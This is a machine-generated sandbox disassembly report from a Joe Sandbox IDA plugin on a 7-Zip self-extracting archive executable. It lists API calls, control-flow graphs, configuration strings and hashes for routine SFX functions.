                                              • ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z.MSVCRT ref: 00405C0F
                                                • Part of subcall function 00402017: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00405C1B,?,00000000), ref: 00402023
                                                • Part of subcall function 00402017: CreateWindowExW.USER32(00000000,Static,0041A584,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00402040
                                                • Part of subcall function 00402017: SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00402052
                                                • Part of subcall function 00402017: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0040205F
                                                • Part of subcall function 00402017: DispatchMessageW.USER32(?), ref: 00402069
                                                • Part of subcall function 00402017: KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,00405C1B,?,00000000), ref: 00402072
                                                • Part of subcall function 00402017: KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,00405C1B,?,00000000), ref: 00402079
                                              • GetVersionExW.KERNEL32(?,?,00000000), ref: 00405C2C
                                              • GetCommandLineW.KERNEL32(?,00000020,?,00000000), ref: 00405CBB
                                                • Part of subcall function 004030CC: ??3@YAXPAX@Z.MSVCRT ref: 0040313F
                                                • Part of subcall function 004030CC: ??3@YAXPAX@Z.MSVCRT ref: 0040315A
                                                • Part of subcall function 004030CC: ??3@YAXPAX@Z.MSVCRT ref: 00403162
                                                • Part of subcall function 004030CC: ??3@YAXPAX@Z.MSVCRT ref: 004031D2
                                              • lstrlenW.KERNEL32(?,00000000,00000000), ref: 00405CE6
                                                • Part of subcall function 00404D0B: #17.COMCTL32(00000000,?,?), ref: 00404D17
                                                • Part of subcall function 00404D0B: SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000,?,?,?,?,?,?,?), ref: 00404D9D
                                                • Part of subcall function 00404D0B: wsprintfW.USER32 ref: 00404DB8
                                              • wsprintfW.USER32 ref: 00405D45
                                              • _wtol.MSVCRT(-00000002), ref: 00405D7F
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405DCE
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405DE2
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405DEA
                                                • Part of subcall function 004011B7: ??2@YAPAXI@Z.MSVCRT ref: 004011D7
                                                • Part of subcall function 004011B7: ??3@YAXPAX@Z.MSVCRT ref: 004011FD
                                              • GetModuleFileNameW.KERNEL32(00000000,00000208), ref: 00405E61
                                              • _wtol.MSVCRT(-00000002), ref: 00405F89
                                              • ??2@YAPAXI@Z.MSVCRT ref: 00406118
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040619B
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00406211
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040622D
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040626B
                                              • wsprintfW.USER32 ref: 00406295
                                              • _wtol.MSVCRT(?), ref: 004064B6
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00406587
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004065D4
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004065DC
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004065FB
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00406653
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040665B
                                              • GetCommandLineW.KERNEL32(?,00000000,?,?), ref: 004066C3
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040673B
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00406743
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040674B
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00406753
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040675B
                                              • GetCurrentProcess.KERNEL32(000000FF,000000FF,?,?,?,?,00000000), ref: 00406767
                                              • SetProcessWorkingSetSize.KERNEL32(00000000), ref: 0040676E
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040678A
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00406792
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040679A
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004067A2
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004067BE
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004067C6
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004067CE
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004067D6
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040687F
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004068A4
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00406916
                                              • CoInitialize.OLE32(00000000), ref: 00406937
                                              • lstrlenW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00406991
                                              • _wtol.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00406A68
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00406A8B
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00406AC4
                                              • GetKeyState.USER32(00000010), ref: 00406B1B
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00406C59
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00406C67
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00406C92
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00406C9A
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00406CB6
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00406CBE
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00406CEE
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00406D2E
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00406D97
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00406D9F
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00406E64
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00406E6F
                                              • GetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 00406E79
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00406F33
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00406F3B
                                              • _wtol.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406FCF
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004071AE
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004071B6
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004071DA
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00407223
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040722B
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00407233
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00407239
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00407249
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00407251
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040726E
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00407276
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040727E
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00407286
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040728E
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004072AF
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004072B7
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004072C3
                                                • Part of subcall function 00409606: wvsprintfW.USER32(?,00000000,?), ref: 0040962A
                                                • Part of subcall function 00409606: GetLastError.KERNEL32 ref: 0040963B
                                                • Part of subcall function 00409606: FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,004072DC), ref: 00409663
                                                • Part of subcall function 00409606: FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,004072DC), ref: 00409678
                                                • Part of subcall function 00409606: lstrlenW.KERNEL32(?), ref: 0040968B
                                                • Part of subcall function 00409606: lstrlenW.KERNEL32(?), ref: 00409692
                                                • Part of subcall function 00409606: ??2@YAPAXI@Z.MSVCRT ref: 004096A7
                                                • Part of subcall function 00409606: lstrcpyW.KERNEL32(00000000,?), ref: 004096BD
                                                • Part of subcall function 00409606: lstrcpyW.KERNEL32(-00000002,?), ref: 004096CE
                                                • Part of subcall function 00409606: ??3@YAXPAX@Z.MSVCRT ref: 004096D7
                                                • Part of subcall function 00409606: LocalFree.KERNEL32(?), ref: 004096E1
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004072E4
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004072EC
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004072F4
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004072FA
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00407302
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040730A
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00407312
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00407331
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00407339
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00407341
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00407347
                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000000,?,?), ref: 00407380
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004073AA
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040746E
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00407476
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040748D
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004074A1
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004074A9
                                              • MessageBoxA.USER32(00000000,Sorry, this program requires Microsoft Windows 2000 or later.,7-Zip SFX,00000010), ref: 004074C2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: ??3@$Message_wtol$lstrlen$??2@wsprintf$CommandCurrentFileFormatLineModuleProcessTimerlstrcpy$?_set_new_handler@@AttributesCallbackCreateDirectoryDispatchDispatcherErrorFolderFreeHandleInitializeKillLastLocalNamePathSizeSpecialStateUserVersionWindowWorkingwvsprintf
                                              • String ID: " -$$A$0A$0A$0A$123456789ABCDEFGHJKMNPQRSTUVWXYZ$7-Zip SFX$7ZipSfx.%03x$7zSfxString%d$7zSfxVarCmdLine0$7zSfxVarCmdLine1$7zSfxVarCmdLine2$7zSfxVarModulePlatform$7zSfxVarSystemLanguage$7zSfxVarSystemPlatform$AutoInstall$BeginPrompt$BeginPromptTimeout$Delete$ExecuteFile$ExecuteParameters$FinishMessage$GUIFlags$GUIMode$HelpText$InstallPath$MiscFlags$OverwriteMode$RunProgram$SelfDelete$SetEnvironment$SfxAuthor$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$amd64$bpt$del$forcenowait$hidcon$i386$nowait$pA$setup.exe$sfxconfig$sfxelevation$sfxlang$sfxversion$sfxwaitall$shc$waitall$x64$x86$A$A$A
                                              • API String ID: 1301190434-1447873201
                                              • Opcode ID: b83124d88e2db66dd2d1e3eb4e7ee556b62859b735d7ccbe44bf373ef164a074
                                              • Instruction ID: 37b3d77bb6f8fb102f6eda89de8ddb12e9592f0eac1975534991a7b966549d26
                                              • Opcode Fuzzy Hash: b83124d88e2db66dd2d1e3eb4e7ee556b62859b735d7ccbe44bf373ef164a074
                                              • Instruction Fuzzy Hash: 69E2E271904208AADF25AF62DC46AEE3768EF04304F54403BFD06B61D2EB7D9991CB5E

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 793 40247d-402492 794 4024b0-4024b9 793->794 795 402494 793->795 797 4024c5-4024fb GetLastError wsprintfW GetEnvironmentVariableW GetLastError 794->797 798 4024bb-4024c0 794->798 796 402499-40249e 795->796 796->794 799 4024a0-4024ae 796->799 801 402575-402586 SetLastError 797->801 802 4024fd-40252a ??2@YAPAXI@Z GetEnvironmentVariableW 797->802 800 402637-40263a 798->800 799->794 799->796 803 402636 801->803 804 40258c-40259a 801->804 805 40256c 802->805 806 40252c-402530 GetLastError 802->806 803->800 808 4025ab-4025da lstrlenA ??2@YAPAXI@Z 804->808 809 40259c-4025a7 call 402427 804->809 807 40256f ??3@YAXPAX@Z 805->807 806->805 810 402532-40253a 806->810 811 402574 807->811 813 402616-402630 MultiByteToWideChar 808->813 814 4025dc-402601 GetLocaleInfoW 808->814 809->808 821 4025a9 809->821 815 402561-40256a 810->815 816 40253c-402549 lstrcmpiW 810->816 811->801 813->803 814->813 818 402603-402611 _wtol 814->818 815->801 819 40254b-40255c ??3@YAXPAX@Z 816->819 820 40255e-40255f 816->820 818->813 819->811 820->807 821->808
                                              APIs
                                              • GetLastError.KERNEL32(00000000,?,?), ref: 004024CC
                                              • wsprintfW.USER32 ref: 004024DD
                                              • GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004024F2
                                              • GetLastError.KERNEL32 ref: 004024F7
                                              • ??2@YAPAXI@Z.MSVCRT ref: 00402512
                                              • GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402525
                                              • GetLastError.KERNEL32 ref: 0040252C
                                              • lstrcmpiW.KERNEL32(00AB9258,?), ref: 00402541
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00402551
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040256F
                                              • SetLastError.KERNEL32(00000003), ref: 00402578
                                              • lstrlenA.KERNEL32(0041B328), ref: 004025AC
                                              • ??2@YAPAXI@Z.MSVCRT ref: 004025C7
                                              • GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 004025F9
                                              • _wtol.MSVCRT(?), ref: 0040260A
                                              • MultiByteToWideChar.KERNEL32(00000000,0041B328,00000001,00AB9258,00000002), ref: 0040262A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: ErrorLast$??2@??3@EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
                                              • String ID: 7zSfxString%d
                                              • API String ID: 2117570002-3906403175
                                              • Opcode ID: eba394e492bfb50e151d824ecc1c1c613fe538debf7ee36fbf13e84896701797
                                              • Instruction ID: 1954578a42ed511618fabe736ee1125ec7d3cad31fc3f85986fc13fa068848c6
                                              • Opcode Fuzzy Hash: eba394e492bfb50e151d824ecc1c1c613fe538debf7ee36fbf13e84896701797
                                              • Instruction Fuzzy Hash: 9951A379900214FFDB10DF75DD49ADABBA9FB08340F10443AE946E62D0E7B8A951CB1D

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1124 4039e7-403a0d lstrlenW call 402a67 1127 403a18-403a24 1124->1127 1128 403a0f-403a13 call 4011b7 1124->1128 1130 403a26-403a2a 1127->1130 1131 403a2c-403a32 1127->1131 1128->1127 1130->1131 1132 403a35-403a37 1130->1132 1131->1132 1133 403a5b-403a64 call 401e6b 1132->1133 1136 403a66-403a79 GetSystemTimeAsFileTime GetFileAttributesW 1133->1136 1137 403a4a-403a4c 1133->1137 1138 403a92-403a9b call 401e6b 1136->1138 1139 403a7b-403a89 call 40367d 1136->1139 1140 403a39-403a41 1137->1140 1141 403a4e-403a50 1137->1141 1154 403aac-403aae 1138->1154 1155 403a9d-403aaa call 409606 1138->1155 1139->1138 1153 403a8b-403a8d 1139->1153 1140->1141 1146 403a43-403a47 1140->1146 1142 403a56 1141->1142 1143 403b0a-403b10 1141->1143 1142->1133 1149 403b12-403b1d 1143->1149 1150 403b3a-403b4d call 409606 ??3@YAXPAX@Z 1143->1150 1146->1141 1151 403a49 1146->1151 1149->1150 1156 403b1f-403b23 1149->1156 1165 403b4f-403b53 1150->1165 1151->1137 1160 403b2f-403b38 ??3@YAXPAX@Z 1153->1160 1157 403ab0-403acf memcpy 1154->1157 1158 403afe-403b08 ??3@YAXPAX@Z 1154->1158 1155->1153 1156->1150 1162 403b25-403b2a 1156->1162 1163 403ad1 1157->1163 1164 403ae4-403ae8 1157->1164 1158->1165 1160->1165 1162->1150 1167 403b2c-403b2e 1162->1167 1168 403ae3 1163->1168 1169 403ad3-403adb 1164->1169 1170 403aea-403af7 call 401e6b 1164->1170 1167->1160 1168->1164 1169->1170 1171 403add-403ae1 1169->1171 1170->1155 1174 403af9-403afc 1170->1174 1171->1168 1171->1170 1174->1157 1174->1158
                                              APIs
                                              • lstrlenW.KERNEL32(00401A74,00000000,?,?,?,?,?,?,00401A74,?), ref: 004039F4
                                              • GetSystemTimeAsFileTime.KERNEL32(?,00401A74,?,?,?,?,00401A74,?), ref: 00403A6A
                                              • GetFileAttributesW.KERNELBASE(?,?,?,?,?,00401A74,?), ref: 00403A71
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00403B30
                                                • Part of subcall function 004011B7: ??2@YAPAXI@Z.MSVCRT ref: 004011D7
                                                • Part of subcall function 004011B7: ??3@YAXPAX@Z.MSVCRT ref: 004011FD
                                              • memcpy.MSVCRT ref: 00403AC2
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00403AFF
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00403B45
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: ??3@$FileTime$??2@AttributesSystemlstrlenmemcpy
                                              • String ID:
                                              • API String ID: 846840743-0
                                              • Opcode ID: 61fbb82b866355ca103b6651924008aad8ffda89ca2a341e34f636fd10af957e
                                              • Instruction ID: 952cd346550c55d7e35c26256f51fad4d5ed31c9206aabe41908170679320093
                                              • Opcode Fuzzy Hash: 61fbb82b866355ca103b6651924008aad8ffda89ca2a341e34f636fd10af957e
                                              • Instruction Fuzzy Hash: 4141E836A00112AADB20AF59C841ABF7B7CEB4170AF50413BEC81B21D1D77D5A4286DD

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1204 402665-402684 LoadLibraryA GetProcAddress 1205 402692-402695 1204->1205 1206 402686-402691 GetNativeSystemInfo 1204->1206
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,?,?,?,?,?,0040269B,00405D06,7zSfxVarModulePlatform,x86), ref: 00402675
                                              • GetProcAddress.KERNEL32(00000000), ref: 0040267C
                                              • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,0040269B,00405D06,7zSfxVarModulePlatform,x86), ref: 0040268A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: AddressInfoLibraryLoadNativeProcSystem
                                              • String ID: GetNativeSystemInfo$kernel32
                                              • API String ID: 2103483237-3846845290
                                              • Opcode ID: 19664b54b855b72bcbaa716dd824881a6f451c3f2b4ed8b8d333fe071d6dfa80
                                              • Instruction ID: 08739c12cb3b948957cf2c0406c7fd7347f4194bf9f07d28511d247575205d7a
                                              • Opcode Fuzzy Hash: 19664b54b855b72bcbaa716dd824881a6f451c3f2b4ed8b8d333fe071d6dfa80
                                              • Instruction Fuzzy Hash: AAD05EB0A0520576CB00ABB15D0E9EB7AEC5A48608B144461A806F00C5EAADDD90C36A

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1246 40367d-403694 GetFileAttributesW 1247 403696-403698 1246->1247 1248 40369a-40369c 1246->1248 1249 4036f3-4036f5 1247->1249 1250 4036ab-4036b2 1248->1250 1251 40369e-4036a9 SetLastError 1248->1251 1252 4036b4-4036bb call 403650 1250->1252 1253 4036bd-4036c0 1250->1253 1251->1249 1252->1249 1255 4036f0-4036f2 1253->1255 1256 4036c2-4036d3 FindFirstFileW 1253->1256 1255->1249 1256->1252 1258 4036d5-4036ee FindClose CompareFileTime 1256->1258 1258->1252 1258->1255
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(?,-00000001), ref: 0040368B
                                              • SetLastError.KERNEL32(00000010), ref: 004036A0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: AttributesErrorFileLast
                                              • String ID:
                                              • API String ID: 1799206407-0
                                              • Opcode ID: d36faaefddfd81e2762f97a3370e571bf9c3961ee8d128041245bb49f3de1fe9
                                              • Instruction ID: 2afa7e6ed9b3c4e8b0be6899d5053f20146e769dcf51bfeaf0e83b5e475a48be
                                              • Opcode Fuzzy Hash: d36faaefddfd81e2762f97a3370e571bf9c3961ee8d128041245bb49f3de1fe9
                                              • Instruction Fuzzy Hash: 7001AD30402014BEDB206F759C099EA3B5CAF0132AF204E32F822F23D0D739CB469A5E
                                              APIs
                                              • GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 00401246
                                              • SendMessageW.USER32(00008001,00000000,?), ref: 0040129F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: DiskFreeMessageSendSpace
                                              • String ID:
                                              • API String ID: 696007252-0
                                              • Opcode ID: 5bb3e25784e11187b05554fa092f685445669e0df266ab708f25aa21da7aa29e
                                              • Instruction ID: 952f35bfd535ad09d3a1e6728af904cc40037fdc81ed9fa17bdc1f07510a46f8
                                              • Opcode Fuzzy Hash: 5bb3e25784e11187b05554fa092f685445669e0df266ab708f25aa21da7aa29e
                                              • Instruction Fuzzy Hash: 3F016DB4611208ABEB94DB52DC45F9A77A9AB01714F10807EFD00FA1F0C7B9A9808B1D

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 822 401b0b-401b1b 823 401b27-401b52 call 413cbd 822->823 824 401b1d-401b22 822->824 829 401b54 823->829 830 401b65-401b71 call 4014eb 823->830 825 401e65-401e68 824->825 831 401b56-401b60 call 412574 829->831 836 401e47-401e62 ??3@YAXPAX@Z call 412574 830->836 837 401b77-401b7c 830->837 838 401e64 831->838 836->838 837->836 839 401b82-401bb8 call 401403 call 4017c0 call 40143c ??3@YAXPAX@Z 837->839 838->825 849 401e2d-401e30 839->849 850 401bbe-401bdd 839->850 851 401e32-401e45 ??3@YAXPAX@Z call 412574 849->851 854 401bf8-401bfc 850->854 855 401bdf-401bf3 call 412574 ??3@YAXPAX@Z 850->855 851->838 858 401c03-401c08 854->858 859 401bfe-401c01 854->859 855->831 862 401c2a-401c2d 858->862 863 401c0a 858->863 861 401c30-401c47 859->861 861->855 867 401c49-401c6c 861->867 862->861 864 401c0c-401c12 863->864 868 401c14-401c25 call 412574 ??3@YAXPAX@Z 864->868 872 401c87-401c8d 867->872 873 401c6e-401c82 call 412574 ??3@YAXPAX@Z 867->873 868->831 875 401ca9-401cbb GetLocalTime SystemTimeToFileTime 872->875 876 401c8f-401c92 872->876 873->831 879 401cc1-401cc4 875->879 877 401c94-401c96 876->877 878 401c9b-401ca7 876->878 877->864 878->879 881 401cc6-401cd0 call 4039e7 879->881 882 401cdd-401ce4 call 40367d 879->882 881->868 887 401cd6-401cd8 881->887 886 401ce9-401cee 882->886 888 401cf4-401cf7 886->888 889 401e19-401e28 GetLastError 886->889 887->864 890 401cfd-401d07 ??2@YAPAXI@Z 888->890 891 401e0f-401e12 888->891 889->849 893 401d18 890->893 894 401d09-401d16 890->894 891->889 895 401d1a-401d3e call 41334e call 412468 893->895 894->895 900 401df4-401e0d call 4136b9 call 412574 895->900 901 401d44-401d62 GetLastError call 4013d1 call 4033bd 895->901 900->851 910 401d64-401d6b 901->910 911 401d9f-401db4 call 4039e7 901->911 914 401d6f-401d7f ??3@YAXPAX@Z 910->914 915 401dc0-401dd8 call 412468 911->915 916 401db6-401dbe 911->916 917 401d81-401d83 914->917 918 401d87-401d9a call 412574 ??3@YAXPAX@Z 914->918 924 401dda-401de9 GetLastError 915->924 925 401deb-401df3 ??3@YAXPAX@Z 915->925 916->914 917->918 918->831 924->914 925->900
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 55ca3ee3d26e98f30d69d3e888b340bde38f36a0fcd7a85b294178b1590f4b85
                                              • Instruction ID: f12f3cbfd9e378c4fb4e9f7b852960855991058b71a72fc1bb9c774fc2295476
                                              • Opcode Fuzzy Hash: 55ca3ee3d26e98f30d69d3e888b340bde38f36a0fcd7a85b294178b1590f4b85
                                              • Instruction Fuzzy Hash: 2CB18071900204EFCF15EFA5C8849EEB7B5FF44304B20852BF812A72A1DB78E945CB59

                                              Control-flow Graph

                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00405C1B,?,00000000), ref: 00402023
                                              • CreateWindowExW.USER32(00000000,Static,0041A584,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00402040
                                              • SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00402052
                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0040205F
                                              • DispatchMessageW.USER32(?), ref: 00402069
                                              • KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,00405C1B,?,00000000), ref: 00402072
                                              • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,00405C1B,?,00000000), ref: 00402079
                                              Strings
                                              Memory Dump Source
